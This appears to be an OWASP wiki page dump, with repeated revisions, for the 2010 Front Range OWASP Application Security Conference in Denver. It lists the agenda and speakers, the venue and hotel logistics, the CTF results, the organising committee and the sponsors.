| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Byrne|"Anatomy of a Logic Flaw"]]<br />
''David Byrne and Charles Henderson, Trustwave''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]"<br />
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Nickerson|"YOU are the weakest link"]]<br />
''Chris Nickerson, Lares Consulting''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Whaley|"Effectively marketing security as a win for both the business and the customer"]]<br />
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]"<br />
''Alex Wheeler and Ryan Smith, Accuvant''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Roberts|"Real life CSI – Data Mining and Intelligence Gathering for the masses"]]<br />
''Chris Roberts, Cyopsis''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Dickson|"The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise"]]<br />
''John Dickson, Denim Group''<br />
<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:40 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]"<br />
''David Byrne and Rohini Sulatycki, Trustwave''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Zusman2|"What's Old Is New Again: An Overview of Mobile Application Security"]]<br />
''Zach Lanier and Mike Zusman, Intrepidus Group''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Goldschmidt|"Fundamental Practices and Tools to implement a security development lifecycle"]]<br />
''Cassio Goldschmidt, Symantec''<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 14:40-15:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | BREAK<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an Enterprise Security API]]"<br />
''Chris Schmidt''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Tucker|"Cloudy with a chance of hack"]]<br />
''Lars Ewe, Cenzic''<br />
<br />
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&hl=en Presentation]<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Cornell|"Application Security Program Management with Vulnerability Manager"]]<br />
''Bryan Beverly, Denim Group''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&hl=en Presentation]<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Panel Discussion: Topic TBD. Moderator: John Dickson, Denim Group<br />
|-<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Wrap up, vendor raffles, CTF awards, FREE BEER!<br />
|-<br />
<br />
|}<br />
<br />
<br />
====Logistics====<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will again be held at University of Colorado, Denver. However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).<br />
<br />
[[File:Froc map.GIF|thumb|left]]<br />
<br />
[http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1200+Larimer+Street,+Denver,+CO&sll=37.0625,-95.677068&sspn=37.188995,62.226563&ie=UTF8&hq=&hnear=1200+Larimer+St,+Denver,+Colorado+80204&z=16&iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]<br />
<br />
=====Accomodation=====<br />
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro]. Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&hotelID=14708 iHotelier.com link here].<br />
<br />
=====How to get to the venue?=====<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the UCD. Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings. Parking validation will be provided for registered FROC participants.<br />
<br />
<br />
<!-- <br />
====Call for Presentations====<br />
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010. We are no longer accepting proposals for presentations. If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --><br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<!-- <br />
====Agenda and Presentations: 5 March 2009====<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
<br />
[http://video.google.com/videoplay?docid=2875886330538461390 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
<br />
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=1629208419122953007 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
<br />
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
<br />
[http://video.google.com/videoplay?docid=3127205451740977427 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=7611144342490803641 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
<br />
[http://video.google.com/videoplay?docid=129190988572738701 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
<br />
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
<br />
[http://video.google.com/videoplay?docid=8588268474844052248 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
--><br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
====Capture the Flag (CTF)====<br />
<br />
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications. The winner received a new iPad. Second and third place received an iPod shuffle.<br />
<br />
<br />
Final scores:<br />
{| border="3"<br />
|Rank||Name||Score||Comments<br />
|-<br />
|'''1'''||'''mantis'''||'''4500'''||<br />
|-<br />
|'''2'''||'''Mathew Rowley'''||'''2850'''||'''(wuntee)'''<br />
|-<br />
|'''3'''||'''jgimer'''||'''2300'''||<br />
|-<br />
|4||jsouza||2200||<br />
|-<br />
|5||CSURams||1800||<br />
|-<br />
|6||quincymagoo||1200||<br />
|-<br />
|7||skehoe||700||<br />
|-<br />
|8||jtevans||700||<br />
|-<br />
|9||igctf||700||<br />
|-<br />
|10||kdavis||700||<br />
|}<br />
<br />
<br />
====Conference Committee====<br />
<br />
FROC 2010 Planning Committee Chair: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
Presentation Selection Committee:<br />
* Mark Bristow - OWASP Global Conference Committee<br />
* David Campbell - OWASP Denver<br />
* Eric Duprey - OWASP Denver<br />
* Chris Hoff - Cloud Security Alliance<br />
* Eoin Keary - Chair, OWASP Global Conference Committee<br />
* Michael Sutton - Cloud Security Alliance<br />
* Jim Reavis - Cloud Security Alliance<br />
<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell at owasp dot org<br />
* Eric Duprey - OWASP Denver - eduprey at owasp dot org<br />
<br />
<br />
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
<br />
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org<br />
<br />
<br />
====Conference Sponsors====<br />
<br />
[[File:Sponsors.PNG]]<br />
<br />
The following organizations are proud sponsors of this conference:<br />
<!-- <br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
*Fishnet Security<br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
*Trustwave<br />
*WhiteHat Security --><br />
<br />
*[http://www.accuvant.com/ Accuvant]<br />
*[http://www.denimgroup.com/ Denim Group]<br />
*[http://www.fortify.com/ Fortify Software]<br />
*[http://www.hosting.com/ Hosting.com]<br />
*[http://www.whitehatsec.com/home/index.html Whitehat Security]<br />
<br />
<br />
If you are interested in sponsoring this OWASP event, please contact Kathy Thaxton at kthaxton at owasp dot org.<br />
<br />
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]<br />
<br />
<br />
====Twitter Feed====<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|} <br />
<br />
<br />
<!-- <hr><br />
<paypal>Denver</paypal> --><br />
<br />
<headertabs /></div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&diff=84408Front Range OWASP Conference 20102010-06-03T21:30:24Z<p>Eduprey: </p>
<hr />
<div>__NOTOC__ <br />
<br />
<!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --><br />
FROC2010 was a major success! If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]<br />
<br />
<br />
<br> <!-- Header --><br />
====Welcome==== <br />
[[Image:Froc2010_sm.png|200px]]<br />
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''<br />
<br />
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! <br />
<br />
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.<br />
<br />
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010. This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.<br />
<br />
====Registration====<br />
<br />
<!-- [http://froc2010.eventbrite.com Registration is now open!] --><br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009. This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis. Pay whatever you or your company can afford.<br />
<br />
<!-- Click [http://froc2010.eventbrite.com HERE] to register now. --><br />
<br />
====Agenda====<br />
<br />
==Agenda and Presentations: 2 June 2010==<br />
<br />
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="4" align="center" style="background:#4058A0; color:white" | June 2, 2010<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Welcome to FROC 2010 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[FROC2010_Abstract_Chess|"Watching Software Run: Software Security Beyond Defect Elimination"]]<br />
''Brian Chess, Fortify Software''<br />
<br />
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&sort=name&layout=list&num=50 Presentation] [http://blip.tv/file/3710067 Video]<br />
<br />
<!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --><br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:35-10:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | OWASP: State of the Union<br />
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''<br />
<br />
[http://blip.tv/file/3710155 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:20 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Cloud Security Alliance: State of the Union<br />
''Randy Barr, Cloud Security Alliance''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:20-10:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:22%; background:#BC857A" | '''AppSec/Technical Track: Room 1'''<br />
| style="width:22%; background:#BCA57A" | '''Cloud/Mobile/Emerging Track: Room 2'''<br />
| style="width:22%; background:#C6E2FF" | '''Management / Exec Track: Room 3'''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]"<br />
''Jeremiah Grossman''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_McClellan|"Building a Secure, Compliant Cloud for the Enterprise"]]<br />
''Matt Ferrari, Hosting.com''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Byrne|"Anatomy of a Logic Flaw"]]<br />
''David Byrne and Charles Henderson, Trustwave''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]"<br />
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Nickerson|"YOU are the weakest link"]]<br />
''Chris Nickerson, Lares Consulting''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Whaley|"Effectively marketing security as a win for both the business and the customer"]]<br />
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]"<br />
''Alex Wheeler and Ryan Smith, Accuvant''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Roberts|"Real life CSI – Data Mining and Intelligence Gathering for the masses"]]<br />
''Chris Roberts, Cyopsis''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Dickson|"The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise"]]<br />
''John Dickson, Denim Group''<br />
<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:40 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]"<br />
''David Byrne and Rohini Sulatycki, Trustwave''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Zusman2|"What's Old Is New Again: An Overview of Mobile Application Security"]]<br />
''Zach Lanier and Mike Zusman, Intrepidus Group''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Goldschmidt|"Fundamental Practices and Tools to implement a security development lifecycle"]]<br />
''Cassio Goldschmidt, Symantec''<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 14:40-15:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | BREAK<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an Enterprise Security API]]"<br />
''Chris Schmidt''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Tucker|"Cloudy with a chance of hack"]]<br />
''Lars Ewe, Cenzic''<br />
<br />
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&hl=en Presentation]<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Cornell|"Application Security Program Management with Vulnerability Manager"]]<br />
''Bryan Beverly, Denim Group''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&hl=en Presentation]<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Panel Discussion: Topic TBD. Moderator: John Dickson, Denim Group<br />
|-<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Wrap up, vendor raffles, CTF awards, FREE BEER!<br />
|-<br />
<br />
|}<br />
<br />
<br />
====Logistics====<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will again be held at University of Colorado, Denver. However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).<br />
<br />
[[File:Froc map.GIF|thumb|left]]<br />
<br />
[http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1200+Larimer+Street,+Denver,+CO&sll=37.0625,-95.677068&sspn=37.188995,62.226563&ie=UTF8&hq=&hnear=1200+Larimer+St,+Denver,+Colorado+80204&z=16&iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]<br />
<br />
=====Accomodation=====<br />
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro]. Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&hotelID=14708 iHotelier.com link here].<br />
<br />
=====How to get to the venue?=====<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the UCD. Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings. Parking validation will be provided for registered FROC participants.<br />
<br />
<br />
<!-- <br />
====Call for Presentations====<br />
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010. We are no longer accepting proposals for presentations. If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --><br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<!-- <br />
====Agenda and Presentations: 5 March 2009====<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
<br />
[http://video.google.com/videoplay?docid=2875886330538461390 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
<br />
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=1629208419122953007 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
<br />
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
<br />
[http://video.google.com/videoplay?docid=3127205451740977427 Video]<br />
|-<br />
